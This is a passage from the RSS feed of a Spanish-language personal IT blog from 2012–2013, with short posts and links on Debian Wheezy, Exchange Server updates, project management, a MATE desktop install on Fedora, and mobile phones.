      <description><![CDATA[<p>Buenas noticias para los usuarios de Debian. Neil McGovern ha confirmado la fecha mediante un comunicado oficial que Debian 7 &#8220;Wheezy&#8221; será publicado entre el 4 y 5 de mayo. Puede parecer un hecho irrelevante pero teniendo en cuenta que la versión 6 se publicó en febrero de 2011 creo que se merece al menos una reseña.</p><br/><p>La nueva versión trae muchas mejoras, como es evidente, pero las principales serían el soporte UEFI y el nuevo instalador que permite agilizar y simplificar la instalación.</p><br/><p>Para obtener más detalles sigue este <a href="http://lists.debian.org/debian-devel-announce/2013/04/msg00006.html" target="_blank">enlace.</a></p><br/><p>&#8212;</p><br/><p><span id="result_box"><span class="hps">Good news</span> <span class="hps">for Debian&#8217;s users</span><span class="hps">.</span> <span class="hps">Neil</span> <span class="hps">McGovern</span> <span class="hps">has confirmed </span></span><span id="result_box"><span class="hps"><span id="result_box"><span class="hps">by</span> <span class="hps">a statement</span></span></span><span class="hps"> </span><span class="hps">that</span> <span class="hps">Debian</span> <span class="hps atn">7 &#8220;</span><span>Wheezy</span><span>&#8221; will be published</span> <span class="hps">between 4th</span> <span class="hps">and</span><span class="hps"> 5th of May</span><span>.</span> <span class="hps">It may seem</span> <span class="hps">an irrelevant fact</span> <span class="hps">but considering</span> <span class="hps">that</span> <span class="hps">version 6</span> <span class="hps">was released in February</span> <span class="hps">of</span> <span class="hps">2011</span> <span class="hps">I think it deserves</span> <span class="hps">at least</span> <span class="hps">a review.</span><br /><br /><span class="hps">The new</span> <span class="hps">version brings</span> <span class="hps">many improvements</span><span>,</span> <span class="hps">as is evident,</span> <span class="hps">but</span><span class="hps"> principals</span> <span class="hps">would</span> <span class="hps">support</span> be <span class="hps">UEFI</span> <span class="hps">and the new</span> <span class="hps">installer that</span> <span class="hps">allows to speed up</span> <span class="hps">and</span> <span class="hps">simplify installation.</span><br /><br /><span class="hps">For more</span> <span class="hps">details</span> <span class="hps">follow this <a href="http://lists.debian.org/debian-devel-announce/2013/04/msg00006.html">link</a>.</span></span></p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Windows 8 protección de contenidos para niños</title>
      <link>https://www.igalvan.es/posts/youtube-httpwww/</link>
      <pubDate>Sun, 21 Apr 2013 11:43:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/youtube-httpwww/</guid>
      <description><![CDATA[<p>[youtube http://www.youtube.com/watch?v=yKutCok_vaQ?wmode=transparent&amp;autohide=1&amp;egm=0&amp;hd=1&amp;iv_load_policy=3&amp;modestbranding=1&amp;rel=0&amp;showinfo=0&amp;showsearch=0&amp;w=500&amp;h=375]<br/><p>Este video tutorial será útil para todos aquellos que tengáis hijos y les permutáis usar un ordenador con Windows 8 instalado.</p><div class="attribution">(<span>Source:</span> <a href="http://www.youtube.com/"><a href="http://www.youtube.com/">http://www.youtube.com/</a></a>)</div></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>10 frases que arruinarán la reunión de arranque del proyecto</title>
      <link>https://www.igalvan.es/posts/10-frases-que-arruinaran-la-reunion-de/</link>
      <pubDate>Tue, 09 Apr 2013 17:47:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/10-frases-que-arruinaran-la-reunion-de/</guid>
      <description><![CDATA[<p>Frases que jamás deberías oir en una reunión de inicio de un proyecto ni en ninguna otra. Lo peor es que son tan comunes que ya ni nos asustan.</p><br /><a href='http://ivanrivera-pmp.blogspot.com.es/2013/03/10-frases-que-arruinaran-la-reunion-de.html'>10 frases que arruinarán la reunión de arranque del proyecto</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Lanzado Jetstress 2013 - Jetstress 2013 Released</title>
      <link>https://www.igalvan.es/posts/lanzado-jetstress-2013-jetstress-2013/</link>
      <pubDate>Mon, 25 Mar 2013 17:26:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/lanzado-jetstress-2013-jetstress-2013/</guid>
      <description><![CDATA[<p>Jetstress se utiliza para comprobar el rendimiento y estabilidad de un subsistema de disco antes de poner un servidor de Exchange en producción. La herramienta ayuda a verificar el rendimiento del disco mediante la simulación de carga de Entrada/Salida (E/S) de disco de Exchange, específicamente simulando carga en las bases de datos y en los ficheros de log producidos por un número específico de usuarios.</p><br/><p>&#8212;</p><br/><p>Jetstress is used to verify the performance and stability of a disk subsystem prior to putting an Exchange server into production. The tool helps to verify disk performance by simulating Exchange disk Input/Output (I/O) load, specifically simulating the database and log file loads produced by a specific number of users.</p><br /><a href='http://www.microsoft.com/en-us/download/details.aspx?id=36849'>Lanzado Jetstress 2013 - Jetstress 2013 Released</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Hay que saber cómo decir NO a las cosas que no te interesan</title>
      <link>https://www.igalvan.es/posts/hay-que-saber-como-decir-no-las-cosas/</link>
      <pubDate>Sun, 17 Feb 2013 12:17:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/hay-que-saber-como-decir-no-las-cosas/</guid>
      <description><![CDATA[<p>¿Sientes que a pesar de no parar de trabajar en todo el día tus tareas se eternizan? Puede ser que tengas demasiadas tareas asignadas, pero casi lo más seguro es que tengas muchos ladrones de tiempo llevandose tu tiempo.</p><br /><a href='http://blog.qualytz.com/2013/02/tiempo-robado.html'>Hay que saber cómo decir NO a las cosas que no te interesan</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>7 Must-Have Project Management Skills for IT Pros</title>
      <link>https://www.igalvan.es/posts/7-must-have-project-management-skills/</link>
      <pubDate>Wed, 13 Feb 2013 19:51:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/7-must-have-project-management-skills/</guid>
      <description><![CDATA[<p>Interesting article about the skills every PM should have.</p><br /><a href='http://www.computerworld.in/feature/7-must-have-project-management-skills-it-pros-61042013'>7 Must-Have Project Management Skills for IT Pros</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Curso para aprender a desarrollar para Android</title>
      <link>https://www.igalvan.es/posts/curso-para-aprender-desarrollar-para/</link>
      <pubDate>Tue, 12 Feb 2013 16:42:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/curso-para-aprender-desarrollar-para/</guid>
      <description><![CDATA[<p>Un compañero me ha pasado un enlace a un curso gratuito para aprender a programar para Android</p><br /><a href='http://www.sgoliver.net/blog/?page_id=3011'>Curso para aprender a desarrollar para Android</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>MATE o lo que Gnome siempre fue</title>
      <link>https://www.igalvan.es/posts/mate-o-lo-que-gnome-siempre-fue/</link>
      <pubDate>Tue, 12 Feb 2013 12:29:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/mate-o-lo-que-gnome-siempre-fue/</guid>
      <description><![CDATA[<p>Llevo unas horas jugando con Fedora 18 y Gnome 3.6 y eso es lo que he tardado en instalar MATE. Se supone que Gnome 3 fue diseñada para maximizar la usabilidad y la productividad, se supone que se han invertidos miles de horas en crearlo, pero&#8230; ¿para qué?</p><br/><p>No entiendo porque tengo que hacer dos clic para cerrar una ventana. Tampoco entiendo porque no puedo personalizar mi escritorio desde un simple clic en vez de una aplicación como <em>Gnome Tweak Tool</em> que no es precisamente muy usable, no entiendo porque necesito un mapa para encontrar las aplicaciones en vez de tener un menú único,&#8230;</p><br/><p>En resumen, demasiados cambios incomprensibles para algo que debería ser una herramienta de trabajo.</p><br/><p>Será que me estoy volviendo viejo, pero todas las ventajas a las que tanto bombo y platillo se han dado a esta versión de Gnome, ¡estaban ya en la versión anterior! Así que me tome el trabajo de instalar MATE para volver a lo que sé que funciona, a lo que siempre me ha parecido perfecto desde el ¡2002!, el vetusto Gnome 2.</p><br/><p>Por cierto, el comando para hacerlo es</p><br/><p><em>$ su -c &#8216;yum groupinstall &#8220;MATE Desktop&#8221;</em></p><br/><p><img src="http://media.tumblr.com/ebc4d54bd2ff9f4175095d00627d3c18/tumblr_inline_mi3x81GxYP1qz4rgp.png" /></p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Priorizar las mejoras en función de su utilidad es básico</title>
      <link>https://www.igalvan.es/posts/priorizar-las-mejoras-en-funcion-de-su/</link>
      <pubDate>Sun, 10 Feb 2013 11:43:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/priorizar-las-mejoras-en-funcion-de-su/</guid>
      <description><![CDATA[<p>Es un concepto básico que muchos CEO no parecen entender, para mejorar primero hay que gastar. Eso sí, primero es necesario analizar si realmente esta mejora se alinea con nuestras necesidades y para realizar un análisis es básico disponer de la información adecuada.</p><br /><a href='http://www.laboratorioti.com/2013/02/08/analisis-de-la-deuda-tecnica/'>Priorizar las mejoras en función de su utilidad es básico</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Empleado del mes realiza outsourcing de su trabajo -- Employee of the Month makes outsourcing of his own job</title>
      <link>https://www.igalvan.es/posts/empleado-del-mes-realiza-outsourcing-de/</link>
      <pubDate>Sat, 19 Jan 2013 10:20:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/empleado-del-mes-realiza-outsourcing-de/</guid>
      <description><![CDATA[<p>¿Genio o caradura? Lo dejo a tu elección &#8212; Genius o cheekey? I leave it to your choice</p><br /><a href='http://www.abc.es/tecnologia/20130117/abci-china-subcontrata-videos-procastinar-201301171157.html'>Empleado del mes realiza outsourcing de su trabajo -- Employee of the Month makes outsourcing of his own job</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cita del día - 18-03</title>
      <link>https://www.igalvan.es/posts/blog-post/</link>
      <pubDate>Wed, 19 Dec 2012 20:54:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/blog-post/</guid>
      <description><![CDATA[<p>A mind once expanded, never regains the same shape<br/><br/>Oliver Wendell Holmes</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>10 Reglas de Oro para una Estimación Satisfactoria</title>
      <link>https://www.igalvan.es/posts/10-reglas-de-oro-para-una-estimacion/</link>
      <pubDate>Wed, 19 Dec 2012 20:32:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/10-reglas-de-oro-para-una-estimacion/</guid>
      <description><![CDATA[<p><a href='http://www.laboratorioti.com/2012/12/17/10-reglas-de-oro-para-una-estimacion-satisfactoria/'>10 Reglas de Oro para una Estimación Satisfactoria</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>ImaXinante: Blade Runner y la visión de futuro de Philip K Dick y Ridley Scott</title>
      <link>https://www.igalvan.es/posts/imaxinante-blade-runner-y-la-vision-de/</link>
      <pubDate>Sun, 16 Dec 2012 13:29:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/imaxinante-blade-runner-y-la-vision-de/</guid>
      <description><![CDATA[<p><a href="http://imaxinante.tumblr.com/post/37932266680/blade-runner-y-la-visi-n-de-futuro-de-philip-k-dick-y" class="tumblr_blog">imaxinante</a>:</p><br/><br/><blockquote><br/><div class="separator" style="clear:both;text-align:none;"><a href="http://assets.flavorwire.com/wp-content/uploads/2012/12/DickLetter.jpg" target="_blank"><img src="http://assets.flavorwire.com/wp-content/uploads/2012/12/DickLetter.jpg" id="blogsy-1355521743816.2217" class="alignnone" alt="" width="500" height="645" /></a></div> <p> Ridley Scott realizó la considerada una de las mejores películas de la historia y desde luego la mejor (para muchas personas) película de ciencia ficción. El film está basado en la historia narrada en el libro de Philip K Dick: <strong>“¿Sueñan los androides con ovejas eléctricas?</strong>”, uno&#8230;</p></blockquote><br /><a href='http://imaxinante.tumblr.com/post/37932266680/blade-runner-y-la-visi-n-de-futuro-de-philip-k-dick-y'>ImaXinante: Blade Runner y la visión de futuro de Philip K Dick y Ridley Scott</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Yo pago 700 euros por un iPhone 5 y así le paga Apple a los que lo fabrican</title>
      <link>https://www.igalvan.es/posts/yo-pago-700-euros-por-un-iphone-5-y-asi/</link>
      <pubDate>Sat, 15 Dec 2012 11:13:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/yo-pago-700-euros-por-un-iphone-5-y-asi/</guid>
      <description><![CDATA[<p>Mientras yo pago a precio de oro el iPhone 5, ellos tratan como basura a la gente que les fabrica los terminales. ¿No podría Apple dedicar 50 euritos de lo que pagamos en Occidente por cada uno de estos móviles a darle una vida digna a esta gente? </p><br/><p>&#8212;-</p><br/><p>While I pay top dollar for the iPhone 5, they treat people makes them the terminals like crap. Could not Apple spend 50 euros of what we paid in the West for each of these phones to provide a decent life to these people?</p><br /><a href='http://es.engadget.com/2012/12/14/periodistas-se-infiltran-en-foxconn-iphone-5/'>Yo pago 700 euros por un iPhone 5 y así le paga Apple a los que lo fabrican - I pay 700 euros for an iPhone 5 and thus Apple pays people who make it</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>5 pasos para desarrollar un buen Plan de trabajo</title>
      <link>https://www.igalvan.es/posts/5-pasos-para-desarrollar-un-buen-plan/</link>
      <pubDate>Sun, 09 Dec 2012 16:33:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/5-pasos-para-desarrollar-un-buen-plan/</guid>
      <description><![CDATA[<p><p dir="ltr">5 pasos antes de comenzar a desarrollar un Plan de trabajo que nunca deberíamos olvidar. </p></p><br /><a href='http://blogs.pmi.org/blog/voices_on_project_management/2011/10/5-steps-to-plan-the-project-pl.html'>5 pasos para desarrollar un buen Plan de trabajo</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Trailer aficionados Dragon Ball</title>
      <link>https://www.igalvan.es/posts/youtube-httpwww_9/</link>
      <pubDate>Sun, 09 Dec 2012 15:16:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/youtube-httpwww_9/</guid>
      <description><![CDATA[<p>[youtube http://www.youtube.com/watch?v=Vx-E9pzOFPM?wmode=transparent&amp;autohide=1&amp;egm=0&amp;hd=1&amp;iv_load_policy=3&amp;modestbranding=1&amp;rel=0&amp;showinfo=0&amp;showsearch=0&amp;w=500&amp;h=375]<br/><p><p dir="ltr">A la gente de la Fox tendría que caersele la cara de vergüenza después de verlo que un grupo de aficionados han hecho con la el poco dinero que han recaudado mediante crowfunding. Espero que puedan terminar haciendo la película que proyectan,  seguro que arrasaría en taquilla. </p></p><div class="attribution">(<span>Source:</span> <a href="http://www.youtube.com/"><a href="http://www.youtube.com/">http://www.youtube.com/</a></a>)</div></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nokia Lumia 620 libre por tan sólo 262 euros</title>
      <link>https://www.igalvan.es/posts/nokia-lumia-620-libre-por-tan-solo-262/</link>
      <pubDate>Sun, 09 Dec 2012 14:48:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/nokia-lumia-620-libre-por-tan-solo-262/</guid>
      <description><![CDATA[<p><p dir="ltr">Nokia está empeñada en dar un buen puñetazo encima de la mesa,  bueno en realidad son tres,  con los Lumia con Windows 8. Estaba revisando las características del Lumia 620 y me he dado cuenta que los finlandeses van a poner un terminal de gama media-alta por un precio ridículo, tan solo 262 euros (al menos en España). Está claro que no no puede competir con un iPhone 5&#160;o un Galaxy SIII,  pero tampoco es su mercado,  yo diría que está más en la línea del SIII mini o el iPhone 4S y ahí se defiende muy bien,  pero que muy bien,  y lo mejor es que cuesta mucho menos.</p><br/><p dir="ltr">Lo que sí tengo claro es que este nuevo Lumia se ha puesto en mi radar y eso que yo estaba ya contando los euros para comprarme un Lumia 920, y es que ese precio tienta mucho. </p></p><br /><a href='http://press.nokia.com/2012/12/05/nokia-introduces-new-nokia-lumia-620/'>Nokia Lumia 620 libre por tan sólo 262 euros</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Windows 8 tendrá soporte hasta... ¡2023!</title>
      <link>https://www.igalvan.es/posts/windows-8-tendra-soporte-hasta-2023/</link>
      <pubDate>Sat, 08 Dec 2012 19:21:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-8-tendra-soporte-hasta-2023/</guid>
      <description><![CDATA[<p>Las diversas ediciones de Windows 8 (8, N, Pro y Enterprise) contarán con un soporte estándar hasta el 9 de enero de 2018 y extendido hasta <strong>el 10 de enero de 2023</strong>, ¡más de diez años después de su llegada el mercado!</p><br /><a href='http://support.microsoft.com/lifecycle/search/default.aspx?sort=PN&amp;alpha=Windows+8&amp;Filter=FilterNO'>Windows 8 tendrá soporte hasta... ¡2023!</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Actualizaciones de seguridad de Microsoft Diciembre 2012</title>
      <link>https://www.igalvan.es/posts/actualizaciones-de-seguridad-de/</link>
      <pubDate>Sat, 08 Dec 2012 18:59:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/actualizaciones-de-seguridad-de/</guid>
      <description><![CDATA[<p>El último boletín de seguridad del año 2012 y viene cargado de actualizaciones que solucionan problemas de ejecución remota de código para Windows Desktop, Windows Server, Office 2010 y Exchange Server 2007 y Exchange Server 2010.</p><br /><a href='http://technet.microsoft.com/en-us/security/bulletin/ms12-dec'>Actualizaciones de seguridad de Microsoft Diciembre 2012</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>LINE: Ahora con llamadas de PC a móvil</title>
      <link>https://www.igalvan.es/posts/line-ahora-con-llamadas-de-pc-movil/</link>
      <pubDate>Fri, 07 Dec 2012 16:29:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/line-ahora-con-llamadas-de-pc-movil/</guid>
      <description><![CDATA[<p><p dir="ltr">Una buena noticia para un producto que no para de crecer. LINE permite realizar llamadas de voz desde el PC al móvil. Este puede ser un movimiento definitivo que permita a esta plataforma en convertirse en un rival de altura para WhatsApp.</p></p><br /><a href='http://en.lineblog.naver.jp/lite/archives/20811788.html'>LINE: Ahora con llamadas de PC a móvil</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nueva cuenta en Tumblr</title>
      <link>https://www.igalvan.es/posts/nueva-cuenta-en-tumblr/</link>
      <pubDate>Sun, 02 Dec 2012 12:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/nueva-cuenta-en-tumblr/</guid>
      <description><![CDATA[<p>Cada vez le puedo dedicar menos tiempo a mi <i>blog</i>. De hecho en los últimos meses nada de él, ya se sabe las obligaciones que uno va contrayendo en la vida hacen que cada vez tengamos menos tiempo para dedicarnos a los que más nos gusta.<br /><br />Hace ya algún tiempo que venía pensando en abrir una cuenta en <i>Tumblr</i>, que por su formato es más probable que pueda dedicarle tiempo, así que me he decidido a ver qué pasa. Voy a probar a interactuar con esta nueva plataforma y antes de final de año decidiré si cierro este <i>blog</i> o sigo en la brecha.<br /><br />Por cierto, he pasado todos los artículos de este <i>blog</i> a mi cuenta de Tumblr en <a href="http://igalvit.tumblr.com/"><a href="http://igalvit.tumblr.com">http://igalvit.tumblr.com</a></a>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La diferencia entre gestión y liderazgo</title>
      <link>https://www.igalvan.es/posts/la-diferencia-entre-gestion-y-liderazgo/</link>
      <pubDate>Sat, 03 Nov 2012 16:41:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-diferencia-entre-gestion-y-liderazgo/</guid>
      <description><![CDATA[<blockquote class="tr_bq">"Solo hay una cosa que deberíamos discutir, y esa es la diferencia entre gestión y liderazgo. Gestionar es figurarse como conseguir que el trabajo se haga. Liderazgo es decidir que necesita ser hecho e inspirar al equipo para que entiendan donde quieres ir." -&nbsp;Gestor de Proyectos, Centro Espacial Johnson.</blockquote>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Desmitificando el objeto de CAS Array</title>
      <link>https://www.igalvan.es/posts/desmitificando-el-objeto-de-cas-array/</link>
      <pubDate>Tue, 30 Oct 2012 15:30:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/desmitificando-el-objeto-de-cas-array/</guid>
      <description><![CDATA[<p>El equipo de producto de Exchange ha publicado un artículo muy interesante en el que se tratan ciertos mitos que existen sobre el objeto de CAS Array en Exchange 2010. Los puntos que se tratan son los siguientes:<br /><br /><ul><li>El objeto de CAS Array no realizar balanceo de carga del tráfico.</li><li>El objeto de CAS Array no sirve OWA, ECP, EWS, Autodescubrimiento, IMAP, SMTP o POP.</li><li>El objeto de CAS Array no necesita ser parte del certificado SSL.</li><li>El objeto de CAS Array no debe ser resuelto vía DNS por clientes externos.</li><li>El objeto de CAS Array no debe ser creado o cambiado después de crear las bases de datos de buzones y mover buzones a ellas.</li><li>El objeto de CAS Array debe ser creado incluso si solo se tiene un CAS o un servidor con múltiples roles.</li></ul><br />Enlace al artículo (parte 1): <a href="http://blogs.technet.com/b/exchange/archive/2012/03/23/demystifying-the-cas-array-object-part-1.aspx" target="_blank"><a href="http://blogs.technet.com/b/exchange/archive/2012/03/23/demystifying-the-cas-array-object-part-1.aspx">http://blogs.technet.com/b/exchange/archive/2012/03/23/demystifying-the-cas-array-object-part-1.aspx</a></a><br />Enlace al artículo (parte2):<a href="http://blogs.technet.com/b/exchange/archive/2012/03/28/demystifying-the-cas-array-object-part-2.aspx" target="_blank"> <a href="http://blogs.technet.com/b/exchange/archive/2012/03/28/demystifying-the-cas-array-object-part-2.aspx">http://blogs.technet.com/b/exchange/archive/2012/03/28/demystifying-the-cas-array-object-part-2.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Exchange 2010 Datacenter Switchover Troubleshooter</title>
      <link>https://www.igalvan.es/posts/exchange-2010-datacenter-switchover/</link>
      <pubDate>Sat, 27 Oct 2012 11:58:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/exchange-2010-datacenter-switchover/</guid>
      <description><![CDATA[<p>Aunque lo habitual es tener bien documentados los procesos de cambio de centro de datos para la plataforma de <i>Exchange Server 2010</i>, a veces se pueden producir casos que no tengamos reflejados en estos documentos.<br /><a name='more'></a><br />Para estos casos, la herramienta  <i>Exchange 2010 Datacenter Switchover Troubleshooter</i> puede ser de mucha ayuda sobre todo teniendo en cuenta la tensión que algunas de estas circunstancias pueden casuar en el persona técnico obligado a cumplir SLA.<br /><br />Esta herramienta es un fichero <i>PowerPoint </i>en el que haciendo clic sobre unas preguntas muy simples ayuda a determinar los comandos a ejecutar en cada situación<br /><br />Enlace de la descarga: <a href="http://gallery.technet.microsoft.com/Exchange-2010-Datacenter-09a81fc6" target="_blank"><a href="http://gallery.technet.microsoft.com/Exchange-2010-Datacenter-09a81fc6">http://gallery.technet.microsoft.com/Exchange-2010-Datacenter-09a81fc6</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cuidar de tus colaboradores eficientes</title>
      <link>https://www.igalvan.es/posts/cuidar-de-tus-colaboradores-eficientes/</link>
      <pubDate>Thu, 25 Oct 2012 06:56:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cuidar-de-tus-colaboradores-eficientes/</guid>
      <description><![CDATA[<p> Quien tiene bajo su mando a un trabajado eficiente tiene una poderosa arma pero que también es delicada. Me resulta molesto ver como algunos jefes adoran su coche, cuidan su móvil como si fuera de oro, pero luego no son capaces de valorar a la gente que trabaja con ellos y motivarlos para que esa capacidad tan importante se potencie.<br /><br />Enlace al artículo: <a href="http://www.expansion.com/2012/10/22/empleo/desarrollo-de-carrera/1350923038.html" target="_blank"><a href="http://www.expansion.com/2012/10/22/empleo/desarrollo-de-carrera/1350923038.html">http://www.expansion.com/2012/10/22/empleo/desarrollo-de-carrera/1350923038.html</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Anunciado Exchange Server 2010 Service Pack 3</title>
      <link>https://www.igalvan.es/posts/anunciado-exchange-server-2010-service/</link>
      <pubDate>Mon, 22 Oct 2012 07:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/anunciado-exchange-server-2010-service/</guid>
      <description><![CDATA[<p>Esto ya lo había comentado anteriormente cuando escribí sobre la finalización del desarrollo de Exchange 2013, pero ahora os traigo el artículo del blog oficial del equipo de Exchange donde se detalla el Service Pack 3 de Exchange Server 2010.<br /><br />Lo malo es que con este anuncio se ve claramente cual es la estrategia de Microsoft respecto a esta versión de Exchange Server. La coexistencia con Exchange Server 2013 o el uso de Windows Server 2012 se queda para dentro de unos meses, lo que no es nada bueno para muchos de nosotros que necesitamos ir probando estos escenarios. Esperemos que todo esto sea para eliminar cualquier posible problema o incompatibilidad y simplificar el transito.<br /><br />Enlace al artículo: <a href="http://blogs.technet.com/b/exchange/archive/2012/09/25/announcing-exchange-2010-service-pack-3.aspx" target="_blank"><a href="http://blogs.technet.com/b/exchange/archive/2012/09/25/announcing-exchange-2010-service-pack-3.aspx">http://blogs.technet.com/b/exchange/archive/2012/09/25/announcing-exchange-2010-service-pack-3.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Poster Microsoft Lync Server 2010</title>
      <link>https://www.igalvan.es/posts/poster-microsoft-lync-server-2010/</link>
      <pubDate>Sun, 21 Oct 2012 11:44:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/poster-microsoft-lync-server-2010/</guid>
      <description><![CDATA[<p>Un poster muy interesante en el que se muestra todas las relaciones, dependencias, flujos de información, puertos y requisitos para <i>Microsoft Lync Server 2010</i>. Es un documento muy útil si trabajáis habitualmente con este producto.<br /><br />Enlace a la descarga: <a href="http://www.microsoft.com/en-us/download/details.aspx?id=6797" target="_blank"><a href="http://www.microsoft.com/en-us/download/details.aspx?id=6797">http://www.microsoft.com/en-us/download/details.aspx?id=6797</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Liberado System Center 2012 Update Rollup 3 (UR3)</title>
      <link>https://www.igalvan.es/posts/liberado-system-center-2012-update/</link>
      <pubDate>Sun, 21 Oct 2012 11:03:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/liberado-system-center-2012-update/</guid>
      <description><![CDATA[<p>Nuevo <i>Update Rollup</i> para <i>System Center</i> 2012 que contiene actualizaciones para <i>Service Manager</i> (4 actualizaciones), <i>Data Protection Manager</i> (7 actualizaciones) y <i>Operations Manager</i> (3 actualizaciones). Si teneis curiosidad por los detalles de los fallos corregidos, os dejo a continuación el enlace.<br /><br />Enlace al artículo: <a href="http://blogs.technet.com/b/servicemanager/archive/2012/10/10/system-center-2012-update-rollup-3-ur3-released.aspx" target="_blank"><a href="http://support.microsoft.com/kb/2756127">http://support.microsoft.com/kb/2756127</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Preview de Internet Explorer 10 para Windows 7</title>
      <link>https://www.igalvan.es/posts/preview-de-internet-explorer-10-para/</link>
      <pubDate>Thu, 18 Oct 2012 20:26:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/preview-de-internet-explorer-10-para/</guid>
      <description><![CDATA[<p>Una buena noticia, <i>Internet Explorer</i> 10 tendrá una nueva preview para <i>Windows </i>7 a partir de mediados de noviembre de este año. Espero que sea la última antes de poder disponer de este magnifico navegador en todos los equipos con <i>Windows </i>7, quedarse en la versión 9 no tenía mucho sentido para un sistema operativo que todavía no ha cumplido cuatro años de vida.<br /><br />Enlace al articulo: <a href="http://blogs.msdn.com/b/ie/archive/2012/10/17/ie10-on-windows-7-available-in-november.aspx"><a href="http://blogs.msdn.com/b/ie/archive/2012/10/17/ie10-on-windows-7-available-in-november.aspx">http://blogs.msdn.com/b/ie/archive/2012/10/17/ie10-on-windows-7-available-in-november.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Finalizado desarrollo Exchange 2013</title>
      <link>https://www.igalvan.es/posts/finalizado-desarrollo-exchange-2013/</link>
      <pubDate>Wed, 17 Oct 2012 18:49:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/finalizado-desarrollo-exchange-2013/</guid>
      <description><![CDATA[<p>El equipo de desarrollo de <i>Exchange </i>ha anunciado que han completado el desarrollo de <i>Exchange</i> 2013, lo que supone un nuevo paso para la publicación de la nueva versión de esta plataforma de correo electrónico.<br /><br />Un pequeño jarro de agua fría, las organizaciones que ya tenemos desplegado <i>Exchange </i>2010 no podremos actualizarnos hasta que salga el SP3 de <i>Exchange </i>2010 al que no se espera hasta el Q2 del próximo año. <br /><br />Enlace al artículo: <a href="http://blogs.technet.com/b/exchange/archive/2012/10/11/the-new-exchange-reaches-rtm.aspx" target="_blank"><a href="http://blogs.technet.com/b/exchange/archive/2012/10/11/the-new-exchange-reaches-rtm.aspx">http://blogs.technet.com/b/exchange/archive/2012/10/11/the-new-exchange-reaches-rtm.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>¿Hacía dónde se dirige la profesión TI?</title>
      <link>https://www.igalvan.es/posts/hacia-donde-se-dirige-la-profesion-ti/</link>
      <pubDate>Sun, 14 Oct 2012 11:03:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/hacia-donde-se-dirige-la-profesion-ti/</guid>
      <description><![CDATA[<div class="separator" style="clear: both; text-align: center;"></div>Un buen video sobre una conferencia del Campus de verano de <i>it</i>SFM en el que varios profesionales pertenecientes a algunas de las grandes empresas del sector hablan sobre el futuro cercano de las profesiones de las Tecnologías de la Información.<br /><br /><div class="separator" style="clear: both; text-align: center;"><object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://0.gvt0.com/vi/ZsHFV2A_a-w/0.jpg"><param name="movie" value="http://www.youtube.com/v/ZsHFV2A_a-w&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266"  src="http://www.youtube.com/v/ZsHFV2A_a-w&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>]]></description>
      
    </item>
    
    
    
    <item>
